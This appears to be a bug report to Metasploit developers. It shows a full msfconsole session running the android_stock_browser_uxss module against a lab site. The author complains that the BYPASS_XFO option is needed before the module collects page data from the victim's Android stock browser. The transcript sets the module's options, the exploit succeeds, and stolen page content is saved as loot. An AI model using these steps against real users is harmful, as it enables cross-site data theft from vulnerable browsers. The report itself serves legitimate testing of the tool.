Using the AOSP Browser on Android 4.1.2, I am unable to collect loot from a specified target URL:
msf > use auxiliary/gather/android_stock_browser_uxss
msf auxiliary(android_stock_browser_uxss) > set URIPATH /
URIPATH => /
msf auxiliary(android_stock_browser_uxss) > set SRVPORT 80
SRVPORT => 80
msf auxiliary(android_stock_browser_uxss) > set TARGET_URLS http://clownchat.sec575.org
TARGET_URLS => http://clownchat.sec575.org
msf auxiliary(android_stock_browser_uxss) > exploit
[*] Auxiliary module execution completed
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://172.16.0.190:80/
[*] Server started.
msf auxiliary(android_stock_browser_uxss) >
[*] 172.16.0.105 android_stock_browser_uxss - Sending initial HTML ...
[*] 172.16.0.105 android_stock_browser_uxss - Request 'GET /'
However, when I set BYPASS_XFO, I do collect the loot from the victim:
msf auxiliary(android_stock_browser_uxss) > kill 0
Stopping job: 0...
msf auxiliary(android_stock_browser_uxss) > set BYPASS_XFO True
BYPASS_XFO => True
msf auxiliary(android_stock_browser_uxss) > exploit
[*] Auxiliary module execution completed
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://172.16.0.190:80/
[*] Server started.
msf auxiliary(android_stock_browser_uxss) > [*] 172.16.0.105 android_stock_browser_uxss - Request 'GET /'
[*] 172.16.0.105 android_stock_browser_uxss - Sending initial HTML ...
[*] 172.16.0.105 android_stock_browser_uxss - Request 'POST /'
[+] Collected data from URL: http://clownchat.sec575.org/activity
[+] Saved to: /root/.msf4/loot/20150116165331_default_172.16.0.105_android.client_243338.txt
In this case, the target server is NOT using X-Frame-Options, and therefore should not require the BYPASS_XFO option (and the awkward popup) for successful exploitation.
Here is a pcap file of the server responses when the BYPASS_XFO option is not set.
https://www.dropbox.com/s/rsz2m2xy6i228b7/android_browser_xss_bypass_xfo_issue.pcap?dl=0
Thanks,
-Josh